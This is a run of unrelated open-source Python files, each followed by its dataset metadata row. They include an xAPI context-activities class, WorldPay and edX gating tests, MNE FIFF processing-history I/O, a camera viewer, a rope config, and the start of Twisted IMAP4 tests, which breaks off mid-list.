raise sg_ext.SecurityGroupInvalidPortRange()
if port_range_min < MIN_PORT or port_range_max > MAX_PORT:
raise exceptions.InvalidInput(
error_message="port_range_min and port_range_max must "
"be >= %s and <= %s" % (MIN_PORT,
MAX_PORT))
def _init_protocols():
if not REVERSE_PROTOCOL_MAP:
for ether_str, ethertype in ETHERTYPES.iteritems():
for proto, proto_int in PROTOCOL_MAP[ethertype].iteritems():
REVERSE_PROTOCOL_MAP[proto_int] = proto.upper()
if not REVERSE_ETHERTYPES:
for ether_str, ethertype in ETHERTYPES.iteritems():
REVERSE_ETHERTYPES[ethertype] = ether_str
_init_protocols()
| apache-2.0 | -1,000,830,491,151,123,100 | 34.436364 | 79 | 0.603899 | false |
zwaters/CLAtoolkit | clatoolkit_project/xapi/tincan/context_activities.py | 7 | 3538 | # Copyright 2014 Rustici Software
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from tincan.serializable_base import SerializableBase
from tincan.activity_list import ActivityList
from tincan.activity import Activity
class ContextActivities(SerializableBase):
_props = [
'category',
'parent',
'grouping',
'other',
]
def __init__(self, *args, **kwargs):
self._category = None
self._parent = None
self._grouping = None
self._other = None
super(ContextActivities, self).__init__(*args, **kwargs)
@property
def category(self):
"""Category for Context Activities
:setter: Tries to convert to :class:`tincan.ActivityList`
:setter type: :class:`tincan.ActivityList`
:rtype: :class:`tincan.ActivityList`
"""
return self._category
@category.setter
def category(self, value):
value = self._activity_or_list(value)
self._category = value
@category.deleter
def category(self):
del self._category
@property
def parent(self):
"""Parent for Context Activities
:setter: Tries to convert to :class:`tincan.ActivityList`
:setter type: :class:`tincan.ActivityList`
:rtype: :class:`tincan.ActivityList`
"""
return self._parent
@parent.setter
def parent(self, value):
value = self._activity_or_list(value)
self._parent = value
@parent.deleter
def parent(self):
del self._parent
@property
def grouping(self):
"""Grouping for Context Activities
:setter: Tries to convert to :class:`tincan.ActivityList`
:setter type: :class:`tincan.ActivityList`
:rtype: :class:`tincan.ActivityList`
"""
return self._grouping
@grouping.setter
def grouping(self, value):
value = self._activity_or_list(value)
self._grouping = value
@grouping.deleter
def grouping(self):
del self._grouping
@property
def other(self):
"""Other for Context Activities
:setter: Tries to convert to :class:`tincan.ActivityList`
:setter type: :class:`tincan.ActivityList`
:rtype: :class:`tincan.ActivityList`
"""
return self._other
@other.setter
def other(self, value):
value = self._activity_or_list(value)
self._other = value
@other.deleter
def other(self):
del self._other
@staticmethod
def _activity_or_list(value):
"""Tries to convert value to :class:`tincan.ActivityList`
:setter type: :class:`tincan.ActivityList`
:rtype: :class:`tincan.ActivityList`
"""
result = value
if value is not None and not isinstance(value, ActivityList):
try:
result = ActivityList([Activity(value)])
except (TypeError, AttributeError):
result = ActivityList(value)
return result
| gpl-3.0 | 8,302,812,838,483,145,000 | 26.426357 | 77 | 0.622386 | false |
biddyweb/merchant | billing/tests/test_world_pay.py | 3 | 2608 | try:
from urlparse import urlparse
except ImportError:
from urllib.parse import urlparse
from xml.dom import minidom
from django.test import TestCase
from django.template import Template, Context
from django.conf import settings
from django.utils.unittest import skipIf
from billing import get_integration
@skipIf(not settings.MERCHANT_SETTINGS.get("world_pay", None), "WorldPay integration not configured")
class WorldPayTestCase(TestCase):
def setUp(self):
self.wp = get_integration("world_pay")
fields = {
"cartId": "TEST123",
"amount": "1",
"currency": "USD",
"testMode": "100",
"futurePayType": "regular",
"option": "0",
"noOfPayments": "12",
"intervalUnit": "3",
"intervalMult": "1",
"normalAmount": "1",
"startDelayUnit": "3",
"startDelayMult": "1",
"instId": "12345",
"signatureFields": "instId:amount:cartId",
}
self.wp.add_fields(fields)
def assertFormIsCorrect(self, form, fields):
dom = minidom.parseString(form)
inputs = dom.getElementsByTagName('input')
values_dict = {}
for el in inputs:
if el.attributes['type'].value == 'hidden' and el.hasAttribute('value'):
values_dict[el.attributes['name'].value] = el.attributes['value'].value
self.assertDictContainsSubset(values_dict, fields)
form_action_url = dom.getElementsByTagName('form')[0].attributes['action'].value
parsed = urlparse(form_action_url)
self.assertEquals(parsed.scheme, 'https')
self.assertEquals(parsed.netloc, 'select-test.worldpay.com')
self.assertEquals(parsed.path, '/wcc/purchase')
def testFormGen(self):
# Since the secret key cannot be distributed
settings.WORLDPAY_MD5_SECRET_KEY = "test"
tmpl = Template("{% load render_integration from billing_tags %}{% render_integration obj %}")
form = tmpl.render(Context({"obj": self.wp}))
self.assertFormIsCorrect(form, self.wp.fields)
def testFormGen2(self):
# Since the secret key cannot be distributed
settings.WORLDPAY_MD5_SECRET_KEY = "test"
self.wp.add_field("signatureFields", "instId:amount:currency:cartId")
self.wp.fields.pop("signature", None)
tmpl = Template("{% load render_integration from billing_tags %}{% render_integration obj %}")
form = tmpl.render(Context({"obj": self.wp}))
self.assertFormIsCorrect(form, self.wp.fields)
| bsd-3-clause | 3,732,140,793,508,197,000 | 37.925373 | 102 | 0.626917 | false |
dgwakeman/mne-python | mne/io/proc_history.py | 13 | 11641 | # -*- coding: utf-8 -*-
# Authors: Denis A. Engemann <[email protected]>
# Eric Larson <[email protected]>
# License: Simplified BSD
import numpy as np
from scipy.sparse import csc_matrix
import warnings
from .open import read_tag
from .tree import dir_tree_find
from .write import (start_block, end_block, write_int, write_float,
write_string, write_float_matrix, write_int_matrix,
write_float_sparse_rcs, write_id)
from .constants import FIFF
from ..externals.six import text_type
_proc_keys = ['parent_file_id', 'block_id', 'parent_block_id',
'date', 'experimenter', 'creator']
_proc_ids = [FIFF.FIFF_PARENT_FILE_ID,
FIFF.FIFF_BLOCK_ID,
FIFF.FIFF_PARENT_BLOCK_ID,
FIFF.FIFF_MEAS_DATE,
FIFF.FIFF_EXPERIMENTER,
FIFF.FIFF_CREATOR]
_proc_writers = [write_id, write_id, write_id,
write_int, write_string, write_string]
_proc_casters = [dict, dict, dict,
np.array, text_type, text_type]
def _read_proc_history(fid, tree, info):
"""Read processing history from fiff file
This function reads the SSS info, the CTC correction and the
calibaraions from the SSS processing logs inside af a raw file
(C.f. Maxfilter v2.2 manual (October 2010), page 21):
104 = { 900 = proc. history
104 = { 901 = proc. record
103 = block ID
204 = date
212 = scientist
113 = creator program
104 = { 502 = SSS info
264 = SSS task
263 = SSS coord frame
265 = SSS origin
266 = SSS ins.order
267 = SSS outs.order
268 = SSS nr chnls
269 = SSS components
278 = SSS nfree
243 = HPI g limit 0.98
244 = HPI dist limit 0.005
105 = } 502 = SSS info
104 = { 504 = MaxST info
264 = SSS task
272 = SSST subspace correlation
279 = SSST buffer length
105 = }
104 = { 501 = CTC correction
103 = block ID
204 = date
113 = creator program
800 = CTC matrix
3417 = proj item chs
105 = } 501 = CTC correction
104 = { 503 = SSS finecalib.
270 = SSS cal chnls
271 = SSS cal coeff
105 = } 503 = SSS finecalib.
105 = } 901 = proc. record
105 = } 900 = proc. history
"""
proc_history = dir_tree_find(tree, FIFF.FIFFB_PROCESSING_HISTORY)
out = list()
if len(proc_history) > 0:
proc_history = proc_history[0]
proc_records = dir_tree_find(proc_history,
FIFF.FIFFB_PROCESSING_RECORD)
for proc_record in proc_records:
record = dict()
for i_ent in range(proc_record['nent']):
kind = proc_record['directory'][i_ent].kind
pos = proc_record['directory'][i_ent].pos
for key, id_, cast in zip(_proc_keys, _proc_ids,
_proc_casters):
if kind == id_:
tag = read_tag(fid, pos)
record[key] = cast(tag.data)
break
else:
warnings.warn('Unknown processing history item %s' % kind)
record['max_info'] = _read_maxfilter_record(fid, proc_record)
smartshields = dir_tree_find(proc_record,
FIFF.FIFFB_SMARTSHIELD)
if len(smartshields) > 0:
# XXX should eventually populate this
ss = [dict() for _ in range(len(smartshields))]
record['smartshield'] = ss
if len(record['max_info']) > 0:
out.append(record)
if len(proc_records) > 0:
info['proc_history'] = out
def _write_proc_history(fid, info):
"""Write processing history to file"""
if 'proc_history' not in info:
return
if len(info['proc_history']) > 0:
start_block(fid, FIFF.FIFFB_PROCESSING_HISTORY)
for record in info['proc_history']:
start_block(fid, FIFF.FIFFB_PROCESSING_RECORD)
for key, id_, writer in zip(_proc_keys, _proc_ids, _proc_writers):
if key in record:
writer(fid, id_, record[key])
_write_maxfilter_record(fid, record['max_info'])
if 'smartshield' in record:
for ss in record['smartshield']:
start_block(fid, FIFF.FIFFB_SMARTSHIELD)
# XXX should eventually populate this
end_block(fid, FIFF.FIFFB_SMARTSHIELD)
end_block(fid, FIFF.FIFFB_PROCESSING_RECORD)
end_block(fid, FIFF.FIFFB_PROCESSING_HISTORY)
_sss_info_keys = ('job', 'frame', 'origin', 'in_order',
'out_order', 'nchan', 'components', 'nfree',
'hpi_g_limit', 'hpi_dist_limit')
_sss_info_ids = (FIFF.FIFF_SSS_JOB,
FIFF.FIFF_SSS_FRAME,
FIFF.FIFF_SSS_ORIGIN,
FIFF.FIFF_SSS_ORD_IN,
FIFF.FIFF_SSS_ORD_OUT,
FIFF.FIFF_SSS_NMAG,
FIFF.FIFF_SSS_COMPONENTS,
FIFF.FIFF_SSS_NFREE,
FIFF.FIFF_HPI_FIT_GOOD_LIMIT,
FIFF.FIFF_HPI_FIT_DIST_LIMIT)
_sss_info_writers = (write_int, write_int, write_float, write_int,
write_int, write_int, write_int, write_int,
write_float, write_float)
_sss_info_casters = (int, int, np.array, int,
int, int, np.array, int,
float, float)
_max_st_keys = ('job', 'subspcorr', 'buflen')
_max_st_ids = (FIFF.FIFF_SSS_JOB, FIFF.FIFF_SSS_ST_CORR,
FIFF.FIFF_SSS_ST_LENGTH)
_max_st_writers = (write_int, write_float, write_float)
_max_st_casters = (int, float, float)
_sss_ctc_keys = ('parent_file_id', 'block_id', 'parent_block_id',
'date', 'creator', 'decoupler')
_sss_ctc_ids = (FIFF.FIFF_PARENT_FILE_ID,
FIFF.FIFF_BLOCK_ID,
FIFF.FIFF_PARENT_BLOCK_ID,
FIFF.FIFF_MEAS_DATE,
FIFF.FIFF_CREATOR,
FIFF.FIFF_DECOUPLER_MATRIX)
_sss_ctc_writers = (write_id, write_id, write_id,
write_int, write_string, write_float_sparse_rcs)
_sss_ctc_casters = (dict, dict, dict,
np.array, text_type, csc_matrix)
_sss_cal_keys = ('cal_chans', 'cal_corrs')
_sss_cal_ids = (FIFF.FIFF_SSS_CAL_CHANS, FIFF.FIFF_SSS_CAL_CORRS)
_sss_cal_writers = (write_int_matrix, write_float_matrix)
_sss_cal_casters = (np.array, np.array)
def _read_maxfilter_record(fid, tree):
"""Read maxfilter processing record from file"""
sss_info_block = dir_tree_find(tree, FIFF.FIFFB_SSS_INFO) # 502
sss_info = dict()
if len(sss_info_block) > 0:
sss_info_block = sss_info_block[0]
for i_ent in range(sss_info_block['nent']):
kind = sss_info_block['directory'][i_ent].kind
pos = sss_info_block['directory'][i_ent].pos
for key, id_, cast in zip(_sss_info_keys, _sss_info_ids,
_sss_info_casters):
if kind == id_:
tag = read_tag(fid, pos)
sss_info[key] = cast(tag.data)
break
max_st_block = dir_tree_find(tree, FIFF.FIFFB_SSS_ST_INFO) # 504
max_st = dict()
if len(max_st_block) > 0:
max_st_block = max_st_block[0]
for i_ent in range(max_st_block['nent']):
kind = max_st_block['directory'][i_ent].kind
pos = max_st_block['directory'][i_ent].pos
for key, id_, cast in zip(_max_st_keys, _max_st_ids,
_max_st_casters):
if kind == id_:
tag = read_tag(fid, pos)
max_st[key] = cast(tag.data)
break
sss_ctc_block = dir_tree_find(tree, FIFF.FIFFB_CHANNEL_DECOUPLER) # 501
sss_ctc = dict()
if len(sss_ctc_block) > 0:
sss_ctc_block = sss_ctc_block[0]
for i_ent in range(sss_ctc_block['nent']):
kind = sss_ctc_block['directory'][i_ent].kind
pos = sss_ctc_block['directory'][i_ent].pos
for key, id_, cast in zip(_sss_ctc_keys, _sss_ctc_ids,
_sss_ctc_casters):
if kind == id_:
tag = read_tag(fid, pos)
sss_ctc[key] = cast(tag.data)
break
else:
if kind == FIFF.FIFF_PROJ_ITEM_CH_NAME_LIST:
tag = read_tag(fid, pos)
sss_ctc['proj_items_chs'] = tag.data.split(':')
sss_cal_block = dir_tree_find(tree, FIFF.FIFFB_SSS_CAL) # 503
sss_cal = dict()
if len(sss_cal_block) > 0:
sss_cal_block = sss_cal_block[0]
for i_ent in range(sss_cal_block['nent']):
kind = sss_cal_block['directory'][i_ent].kind
pos = sss_cal_block['directory'][i_ent].pos
for key, id_, cast in zip(_sss_cal_keys, _sss_cal_ids,
_sss_cal_casters):
if kind == id_:
tag = read_tag(fid, pos)
sss_cal[key] = cast(tag.data)
break
max_info = dict(sss_info=sss_info, sss_ctc=sss_ctc,
sss_cal=sss_cal, max_st=max_st)
return max_info
def _write_maxfilter_record(fid, record):
"""Write maxfilter processing record to file"""
sss_info = record['sss_info']
if len(sss_info) > 0:
start_block(fid, FIFF.FIFFB_SSS_INFO)
for key, id_, writer in zip(_sss_info_keys, _sss_info_ids,
_sss_info_writers):
if key in sss_info:
writer(fid, id_, sss_info[key])
end_block(fid, FIFF.FIFFB_SSS_INFO)
max_st = record['max_st']
if len(max_st) > 0:
start_block(fid, FIFF.FIFFB_SSS_ST_INFO)
for key, id_, writer in zip(_max_st_keys, _max_st_ids,
_max_st_writers):
if key in max_st:
writer(fid, id_, max_st[key])
end_block(fid, FIFF.FIFFB_SSS_ST_INFO)
sss_ctc = record['sss_ctc']
if len(sss_ctc) > 0: # dict has entries
start_block(fid, FIFF.FIFFB_CHANNEL_DECOUPLER)
for key, id_, writer in zip(_sss_ctc_keys, _sss_ctc_ids,
_sss_ctc_writers):
if key in sss_ctc:
writer(fid, id_, sss_ctc[key])
if 'proj_items_chs' in sss_ctc:
write_string(fid, FIFF.FIFF_PROJ_ITEM_CH_NAME_LIST,
':'.join(sss_ctc['proj_items_chs']))
end_block(fid, FIFF.FIFFB_CHANNEL_DECOUPLER)
sss_cal = record['sss_cal']
if len(sss_cal) > 0:
start_block(fid, FIFF.FIFFB_SSS_CAL)
for key, id_, writer in zip(_sss_cal_keys, _sss_cal_ids,
_sss_cal_writers):
if key in sss_cal:
writer(fid, id_, sss_cal[key])
end_block(fid, FIFF.FIFFB_SSS_CAL)
def _get_sss_rank(sss):
"""Get SSS rank"""
inside = sss['sss_info']['in_order']
nfree = (inside + 1) ** 2 - 1
nfree -= (len(sss['sss_info']['components'][:nfree]) -
sss['sss_info']['components'][:nfree].sum())
return nfree
| bsd-3-clause | 9,045,859,422,633,780,000 | 39.141379 | 78 | 0.514131 | false |
hammerlab/cohorts | cohorts/provenance.py | 1 | 2332 | # Copyright (c) 2017. Mount Sinai School of Medicine
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import warnings
def _provenance_str(provenance):
"""Utility function used by compare_provenance to print diff
"""
return ["%s==%s" % (key, value) for (key, value) in provenance]
def compare_provenance(
this_provenance, other_provenance,
left_outer_diff = "In current but not comparison",
right_outer_diff = "In comparison but not current"):
"""Utility function to compare two abritrary provenance dicts
returns number of discrepancies.
Parameters
----------
this_provenance: provenance dict (to be compared to "other_provenance")
other_provenance: comparison provenance dict
(optional)
left_outer_diff: description/prefix used when printing items in this_provenance but not in other_provenance
right_outer_diff: description/prefix used when printing items in other_provenance but not in this_provenance
Returns
-----------
Number of discrepancies (0: None)
"""
## if either this or other items is null, return 0
if (not this_provenance or not other_provenance):
return 0
this_items = set(this_provenance.items())
other_items = set(other_provenance.items())
# Two-way diff: are any modules introduced, and are any modules lost?
new_diff = this_items.difference(other_items)
old_diff = other_items.difference(this_items)
warn_str = ""
if len(new_diff) > 0:
warn_str += "%s: %s" % (
left_outer_diff,
_provenance_str(new_diff))
if len(old_diff) > 0:
warn_str += "%s: %s" % (
right_outer_diff,
_provenance_str(old_diff))
if len(warn_str) > 0:
warnings.warn(warn_str, Warning)
return(len(new_diff)+len(old_diff))
| apache-2.0 | -2,992,552,527,831,262,700 | 34.876923 | 112 | 0.674099 | false |
RobotLocomotion/director | src/python/scripts/cameraViewer.py | 1 | 2349 | import argparse
from director.consoleapp import ConsoleApp
from director import cameraview
from director import vtkAll as vtk
import PythonQt
from PythonQt import QtCore, QtGui, QtUiTools
def addWidgetsToDict(widgets, d):
for widget in widgets:
if widget.objectName:
d[str(widget.objectName)] = widget
addWidgetsToDict(widget.children(), d)
class WidgetDict(object):
def __init__(self, widgets):
addWidgetsToDict(widgets, self.__dict__)
class CameraVisualizer(object):
def __init__(self):
self.imageManager = cameraview.ImageManager()
def createCameraView(self, channel):
self.imageManager.queue.addCameraStream(channel)
self.imageManager.addImage(channel)
view = PythonQt.dd.ddQVTKWidgetView()
view.orientationMarkerWidget().Off()
view.backgroundRenderer().SetBackground([0,0,0])
view.backgroundRenderer().SetBackground2([0,0,0])
cameraview.CameraImageView(self.imageManager, channel, view=view)
return view
def createUI(self):
loader = QtUiTools.QUiLoader()
uifile = QtCore.QFile(':/ui/ddCameraPanel.ui')
assert uifile.open(uifile.ReadOnly)
self.widget = loader.load(uifile)
self.ui = WidgetDict(self.widget.children())
self.widget.setWindowTitle("Camera Visualizer")
self.ui.gridLayout_2.setSpacing(0)
self.ui.gridLayout_2.setMargin(0)
view = self.createCameraView('CAMERACHEST_LEFT')
frame1Layout = QtGui.QVBoxLayout(self.ui.frame1)
frame1Layout.setSpacing(0)
frame1Layout.setMargin(0)
frame1Layout.addWidget(view)
view = self.createCameraView('CAMERA_LEFT')
frame2Layout = QtGui.QVBoxLayout(self.ui.frame2)
frame2Layout.setSpacing(0)
frame2Layout.setMargin(0)
frame2Layout.addWidget(view)
view = self.createCameraView('CAMERACHEST_RIGHT')
frame3Layout = QtGui.QVBoxLayout(self.ui.frame3)
frame3Layout.setSpacing(0)
frame3Layout.setMargin(0)
frame3Layout.addWidget(view)
def showUI(self):
self.widget.show()
def main():
app = ConsoleApp()
camVis = CameraVisualizer()
camVis.createUI()
camVis.showUI()
app.start()
if __name__ == '__main__':
main()
| bsd-3-clause | 8,476,660,284,654,006,000 | 29.115385 | 73 | 0.660707 | false |
antoviaque/edx-platform | lms/djangoapps/gating/tests/test_api.py | 11 | 6311 | """
Unit tests for gating.signals module
"""
from mock import patch
from ddt import ddt, data, unpack
from xmodule.modulestore.tests.factories import CourseFactory, ItemFactory
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from courseware.tests.helpers import LoginEnrollmentTestCase
from milestones import api as milestones_api
from milestones.tests.utils import MilestonesTestCaseMixin
from openedx.core.lib.gating import api as gating_api
from gating.api import _get_xblock_parent, evaluate_prerequisite
class GatingTestCase(LoginEnrollmentTestCase, ModuleStoreTestCase):
"""
Base TestCase class for setting up a basic course structure
and testing the gating feature
"""
def setUp(self):
"""
Initial data setup
"""
super(GatingTestCase, self).setUp()
# Patch Milestones feature flag
self.settings_patcher = patch.dict('django.conf.settings.FEATURES', {'MILESTONES_APP': True})
self.settings_patcher.start()
# create course
self.course = CourseFactory.create(
org='edX',
number='EDX101',
run='EDX101_RUN1',
display_name='edX 101'
)
self.course.enable_subsection_gating = True
self.course.save()
self.store.update_item(self.course, 0)
# create chapter
self.chapter1 = ItemFactory.create(
parent_location=self.course.location,
category='chapter',
display_name='untitled chapter 1'
)
# create sequentials
self.seq1 = ItemFactory.create(
parent_location=self.chapter1.location,
category='sequential',
display_name='untitled sequential 1'
)
self.seq2 = ItemFactory.create(
parent_location=self.chapter1.location,
category='sequential',
display_name='untitled sequential 2'
)
# create vertical
self.vert1 = ItemFactory.create(
parent_location=self.seq1.location,
category='vertical',
display_name='untitled vertical 1'
)
# create problem
self.prob1 = ItemFactory.create(
parent_location=self.vert1.location,
category='problem',
display_name='untitled problem 1'
)
# create orphan
self.prob2 = ItemFactory.create(
parent_location=self.course.location,
category='problem',
display_name='untitled problem 2'
)
def tearDown(self):
"""
Tear down initial setup
"""
self.settings_patcher.stop()
super(GatingTestCase, self).tearDown()
class TestGetXBlockParent(GatingTestCase):
"""
Tests for the get_xblock_parent function
"""
def test_get_direct_parent(self):
""" Test test_get_direct_parent """
result = _get_xblock_parent(self.vert1)
self.assertEqual(result.location, self.seq1.location)
def test_get_parent_with_category(self):
""" Test test_get_parent_of_category """
result = _get_xblock_parent(self.vert1, 'sequential')
self.assertEqual(result.location, self.seq1.location)
result = _get_xblock_parent(self.vert1, 'chapter')
self.assertEqual(result.location, self.chapter1.location)
def test_get_parent_none(self):
""" Test test_get_parent_none """
result = _get_xblock_parent(self.vert1, 'unit')
self.assertIsNone(result)
@ddt
class TestEvaluatePrerequisite(GatingTestCase, MilestonesTestCaseMixin):
"""
Tests for the evaluate_prerequisite function
"""
def setUp(self):
super(TestEvaluatePrerequisite, self).setUp()
self.user_dict = {'id': self.user.id}
self.prereq_milestone = None
def _setup_gating_milestone(self, min_score):
"""
Setup a gating milestone for testing
"""
gating_api.add_prerequisite(self.course.id, self.seq1.location)
gating_api.set_required_content(self.course.id, self.seq2.location, self.seq1.location, min_score)
self.prereq_milestone = gating_api.get_gating_milestone(self.course.id, self.seq1.location, 'fulfills')
@patch('courseware.grades.get_module_score')
@data((.5, True), (1, True), (0, False))
@unpack
def test_min_score_achieved(self, module_score, result, mock_module_score):
""" Test test_min_score_achieved """
self._setup_gating_milestone(50)
mock_module_score.return_value = module_score
evaluate_prerequisite(self.course, self.prob1.location, self.user.id)
self.assertEqual(milestones_api.user_has_milestone(self.user_dict, self.prereq_milestone), result)
@patch('gating.api.log.warning')
@patch('courseware.grades.get_module_score')
@data((.5, False), (1, True))
@unpack
def test_invalid_min_score(self, module_score, result, mock_module_score, mock_log):
""" Test test_invalid_min_score """
self._setup_gating_milestone(None)
mock_module_score.return_value = module_score
evaluate_prerequisite(self.course, self.prob1.location, self.user.id)
self.assertEqual(milestones_api.user_has_milestone(self.user_dict, self.prereq_milestone), result)
self.assertTrue(mock_log.called)
@patch('courseware.grades.get_module_score')
def test_orphaned_xblock(self, mock_module_score):
""" Test test_orphaned_xblock """
evaluate_prerequisite(self.course, self.prob2.location, self.user.id)
self.assertFalse(mock_module_score.called)
@patch('courseware.grades.get_module_score')
def test_no_prerequisites(self, mock_module_score):
""" Test test_no_prerequisites """
evaluate_prerequisite(self.course, self.prob1.location, self.user.id)
self.assertFalse(mock_module_score.called)
@patch('courseware.grades.get_module_score')
def test_no_gated_content(self, mock_module_score):
""" Test test_no_gated_content """
# Setup gating milestones data
gating_api.add_prerequisite(self.course.id, self.seq1.location)
evaluate_prerequisite(self.course, self.prob1.location, self.user.id)
self.assertFalse(mock_module_score.called)
| agpl-3.0 | 58,090,751,121,986,180 | 33.113514 | 111 | 0.651085 | false |
reflechant/eulerproject | .vscode/.ropeproject/config.py | 41 | 4774 | # The default ``config.py``
# flake8: noqa
def set_prefs(prefs):
"""This function is called before opening the project"""
# Specify which files and folders to ignore in the project.
# Changes to ignored resources are not added to the history and
# VCSs. Also they are not returned in `Project.get_files()`.
# Note that ``?`` and ``*`` match all characters but slashes.
# '*.pyc': matches 'test.pyc' and 'pkg/test.pyc'
# 'mod*.pyc': matches 'test/mod1.pyc' but not 'mod/1.pyc'
# '.svn': matches 'pkg/.svn' and all of its children
# 'build/*.o': matches 'build/lib.o' but not 'build/sub/lib.o'
# 'build//*.o': matches 'build/lib.o' and 'build/sub/lib.o'
prefs['ignored_resources'] = ['*.pyc', '*~', '.ropeproject',
'.hg', '.svn', '_svn', '.git', '.tox']
# Specifies which files should be considered python files. It is
# useful when you have scripts inside your project. Only files
# ending with ``.py`` are considered to be python files by
# default.
#prefs['python_files'] = ['*.py']
# Custom source folders: By default rope searches the project
# for finding source folders (folders that should be searched
# for finding modules). You can add paths to that list. Note
# that rope guesses project source folders correctly most of the
# time; use this if you have any problems.
# The folders should be relative to project root and use '/' for
# separating folders regardless of the platform rope is running on.
# 'src/my_source_folder' for instance.
#prefs.add('source_folders', 'src')
# You can extend python path for looking up modules
#prefs.add('python_path', '~/python/')
# Should rope save object information or not.
prefs['save_objectdb'] = True
prefs['compress_objectdb'] = False
# If `True`, rope analyzes each module when it is being saved.
prefs['automatic_soa'] = True
# The depth of calls to follow in static object analysis
prefs['soa_followed_calls'] = 0
# If `False` when running modules or unit tests "dynamic object
# analysis" is turned off. This makes them much faster.
prefs['perform_doa'] = True
# Rope can check the validity of its object DB when running.
prefs['validate_objectdb'] = True
# How many undos to hold?
prefs['max_history_items'] = 32
# Shows whether to save history across sessions.
prefs['save_history'] = True
prefs['compress_history'] = False
# Set the number spaces used for indenting. According to
# :PEP:`8`, it is best to use 4 spaces. Since most of rope's
# unit-tests use 4 spaces it is more reliable, too.
prefs['indent_size'] = 4
# Builtin and c-extension modules that are allowed to be imported
# and inspected by rope.
prefs['extension_modules'] = []
# Add all standard c-extensions to extension_modules list.
prefs['import_dynload_stdmods'] = True
# If `True` modules with syntax errors are considered to be empty.
# The default value is `False`; When `False` syntax errors raise
# `rope.base.exceptions.ModuleSyntaxError` exception.
prefs['ignore_syntax_errors'] = False
# If `True`, rope ignores unresolvable imports. Otherwise, they
# appear in the importing namespace.
prefs['ignore_bad_imports'] = False
# If `True`, rope will insert new module imports as
# `from <package> import <module>` by default.
prefs['prefer_module_from_imports'] = False
# If `True`, rope will transform a comma list of imports into
# multiple separate import statements when organizing
# imports.
prefs['split_imports'] = False
# If `True`, rope will remove all top-level import statements and
# reinsert them at the top of the module when making changes.
prefs['pull_imports_to_top'] = True
# If `True`, rope will sort imports alphabetically by module name instead of
# alphabetically by import statement, with from imports after normal
# imports.
prefs['sort_imports_alphabetically'] = False
# Location of implementation of rope.base.oi.type_hinting.interfaces.ITypeHintingFactory
# In general case, you don't have to change this value, unless you're an rope expert.
# Change this value to inject you own implementations of interfaces
# listed in module rope.base.oi.type_hinting.providers.interfaces
# For example, you can add you own providers for Django Models, or disable the search
# type-hinting in a class hierarchy, etc.
prefs['type_hinting_factory'] = 'rope.base.oi.type_hinting.factory.default_type_hinting_factory'
def project_opened(project):
"""This function is called after opening the project"""
# Do whatever you like here!
| unlicense | 7,511,925,054,516,250,000 | 41.625 | 100 | 0.677419 | false |
fxia22/ASM_xf | PythonD/site_python/twisted/test/test_imap.py | 2 | 47492 | # Twisted, the Framework of Your Internet
# Copyright (C) 2001 Matthew W. Lefkowitz
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of version 2.1 of the GNU Lesser General Public
# License as published by the Free Software Foundation.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""
Test case for twisted.protocols.imap4
"""
from __future__ import nested_scopes
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
import os, sys, types
from twisted.protocols.imap4 import MessageSet
from twisted.protocols import imap4
from twisted.protocols import loopback
from twisted.internet import defer
from twisted.trial import unittest
from twisted.python import util
from twisted.cred import authorizer, service
from twisted.internet.app import _AbstractServiceCollection # I don't feel like reimplementing this.
def strip(f):
return lambda result, f=f: f()
def sortNest(l):
l = l[:]
l.sort()
for i in range(len(l)):
if isinstance(l[i], types.ListType):
l[i] = sortNest(l[i])
elif isinstance(l[i], types.TupleType):
l[i] = tuple(sortNest(list(l[i])))
return l
class IMAP4UTF7TestCase(unittest.TestCase):
tests = [
['Hello world', 'Hello world'],
['Hello & world', 'Hello &- world'],
['Hello\xffworld', 'Hello&,w-world'],
['\xff\xfe\xfd\xfc', '&,,79,A-'],
]
def testEncode(self):
for (input, output) in self.tests:
self.assertEquals(input.encode('imap4-utf-7'), output)
def testDecode(self):
for (input, output) in self.tests:
# XXX - Piece of *crap* 2.1
self.assertEquals(input, imap4.decoder(output)[0])
class IMAP4HelperTestCase(unittest.TestCase):
def testMessageSet(self):
m1 = MessageSet()
m2 = MessageSet()
self.assertEquals(m1, m2)
m1 = m1 + (1, 3)
self.assertEquals(len(m1), 3)
self.assertEquals(list(m1), [1, 2, 3])
m2 = m2 + (1, 3)
self.assertEquals(m1, m2)
self.assertEquals(list(m1 + m2), [1, 2, 3, 1, 2, 3])
def testQuotedSplitter(self):
cases = [
'''Hello World''',
'''Hello "World!"''',
'''World "Hello" "How are you?"''',
'''"Hello world" How "are you?"''',
'''foo bar "baz buz" NIL''',
'''foo bar "baz buz" "NIL"''',
'''foo NIL "baz buz" bar''',
'''foo "NIL" "baz buz" bar''',
'''"NIL" bar "baz buz" foo''',
]
answers = [
['Hello', 'World'],
['Hello', 'World!'],
['World', 'Hello', 'How are you?'],
['Hello world', 'How', 'are you?'],
['foo', 'bar', 'baz buz', None],
['foo', 'bar', 'baz buz', 'NIL'],
['foo', None, 'baz buz', 'bar'],
['foo', 'NIL', 'baz buz', 'bar'],
['NIL', 'bar', 'baz buz', 'foo'],
]
errors = [
'"mismatched quote',
'mismatched quote"',
'mismatched"quote',
'"oops here is" another"',
]
for s in errors:
self.assertRaises(imap4.MismatchedQuoting, imap4.splitQuoted, s)
for (case, expected) in zip(cases, answers):
self.assertEquals(imap4.splitQuoted(case), expected)
def testStringCollapser(self):
cases = [
['a', 'b', 'c', 'd', 'e'],
